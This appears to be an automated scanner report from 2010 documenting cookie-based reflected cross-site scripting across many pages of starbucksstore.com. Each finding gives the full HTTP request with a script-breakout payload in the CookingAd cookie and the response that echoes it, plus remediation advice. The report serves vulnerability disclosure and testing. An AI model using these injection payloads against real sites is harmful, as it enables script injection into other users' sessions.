Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20750
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSAADCCCB=LODAELCBDOILFIIPEOEHDGFF; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:26:07 GMT
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... "/guestassist/shcontus.asp" var s_setRef="" var s_server="10.11.5.101" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/shcontus.asp" var s_prop3="SBPTPAHP1SHTB52800</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>53AB4BB2221921484" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/shcontus.asp?error=noselection" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddee2</script><script>alert(1)</script>8b507b6fff0 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mya/links.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBddee2</script><script>alert(1)</script>8b507b6fff0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15659
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:05 GMT
Connection: close
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Cont ...[SNIP]... . */ var s_pageName="/mya/links.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/mya/links.asp" var s_prop3="SBPTPAHP1SHTBDDEE2</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>8B507B6FFF0" var s_prop4="" var s_prop5="" var s_prop6="/mya/links.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state="" ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 860c7</script><script>alert(1)</script>9b9756a0816 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mya/track.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB860c7</script><script>alert(1)</script>9b9756a0816;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18382
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:07 GMT
Connection: close
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Cont ...[SNIP]... . */ var s_pageName="/mya/track.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/mya/track.asp" var s_prop3="SBPTPAHP1SHTB860C7</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9B9756A0816" var s_prop4="" var s_prop5="" var s_prop6="/mya/track.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state="" ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6b5c</script><script>alert(1)</script>9153adaaf8c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/include/SearchNav.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBd6b5c</script><script>alert(1)</script>9153adaaf8c;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14427
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:44:17 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... Name="Search Listing:" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/shprodli.asp" var s_prop3="SBPTPAHP1SHTBD6B5C</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9153ADAAF8C" var s_prop4="" var s_prop5="" var s_prop6="/products/shprodli.asp" var s_prop7="" var s_prop8="" var s_prop9="Search Listing: Internal: " var s_prop10="" /* E-commerce Variables */
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a282</script><script>alert(1)</script>e390fba785c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/shabotus.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB3a282</script><script>alert(1)</script>e390fba785c;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14484
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:41:38 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... products/shabotus.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/shabotus.asp" var s_prop3="SBPTPAHP1SHTB3A282</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>E390FBA785C" var s_prop4="" var s_prop5="" var s_prop6="/products/shabotus.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_ ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d15c0</script><script>alert(1)</script>f0bd362f13 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/shourplg.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBd15c0</script><script>alert(1)</script>f0bd362f13;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25377
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:10 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... products/shourplg.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/shourplg.asp" var s_prop3="SBPTPAHP1SHTBD15C0</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F0BD362F13" var s_prop4="" var s_prop5="" var s_prop6="/products/shourplg.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_ ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa301</script><script>alert(1)</script>0485f7d85aa was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/shprodde.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBfa301</script><script>alert(1)</script>0485f7d85aa;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21224
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:41:31 GMT
Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="F ...[SNIP]... ines. */ var s_pageName="HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="HomePage" var s_prop3="SBPTPAHP1SHTBFA301</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0485F7D85AA" var s_prop4="" var s_prop5="" var s_prop6="/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 109e9</script><script>alert(1)</script>b870a4bcca was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/shprodde.asp?SKU=309195 HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB109e9</script><script>alert(1)</script>b870a4bcca;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11887
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:42:26 GMT
Connection: close
<!--S1--><!--S0--> <html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="d ...[SNIP]... ageName="Detail Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Detail Page : 309195 : " var s_prop3="SBPTPAHP1SHTB109E9</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B870A4BCCA" var s_prop4="" var s_prop5="309195 : " var s_prop6="/products/shprodde.asp?SKU=309195" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_ ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9727f</script><script>alert(1)</script>9636677bff4 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/shprodli.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB9727f</script><script>alert(1)</script>9636677bff4;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14427
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:39:00 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... Name="Search Listing:" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/shprodli.asp" var s_prop3="SBPTPAHP1SHTB9727F</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9636677BFF4" var s_prop4="" var s_prop5="" var s_prop6="/products/shprodli.asp" var s_prop7="" var s_prop8="" var s_prop9="Search Listing: Internal: " var s_prop10="" /* E-commerce Variables */
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 798a2</script><script>alert(1)</script>711801d72b9 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/sitemap.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB798a2</script><script>alert(1)</script>711801d72b9;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21157
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:26 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... "/products/sitemap.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/sitemap.asp" var s_prop3="SBPTPAHP1SHTB798A2</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>711801D72B9" var s_prop4="" var s_prop5="" var s_prop6="/products/sitemap.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_s ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d241</script><script>alert(1)</script>487db803af4 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/terms.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2d241</script><script>alert(1)</script>487db803af4;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15962
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:42:01 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... ame="/products/terms.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/terms.asp" var s_prop3="SBPTPAHP1SHTB2D241</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>487DB803AF4" var s_prop4="" var s_prop5="" var s_prop6="/products/terms.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_sta ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fae82</script><script>alert(1)</script>675c202d2cd was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-office-coffee HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBfae82</script><script>alert(1)</script>675c202d2cd;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20742
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:15 GMT
Connection: close
<html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Cont ...[SNIP]... ice HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Small Office HomePage" var s_prop3="SBPTPAHP1SHTBFAE82</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>675C202D2CD" var s_prop4="" var s_prop5="" var s_prop6="/small-office-coffee/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign=" ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3e71</script><script>alert(1)</script>14d1501ca39 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-coffee-delivery HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBb3e71</script><script>alert(1)</script>14d1501ca39;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19580
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:16 GMT
Connection: close
<meta HTTP-EQUIV="Conten ...[SNIP]... at Home HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks at Home HomePage" var s_prop3="SBPTPAHP1SHTBB3E71</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>14D1501CA39" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-coffee-delivery/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_camp ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfd3e</script><script>alert(1)</script>0ff078f663a was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
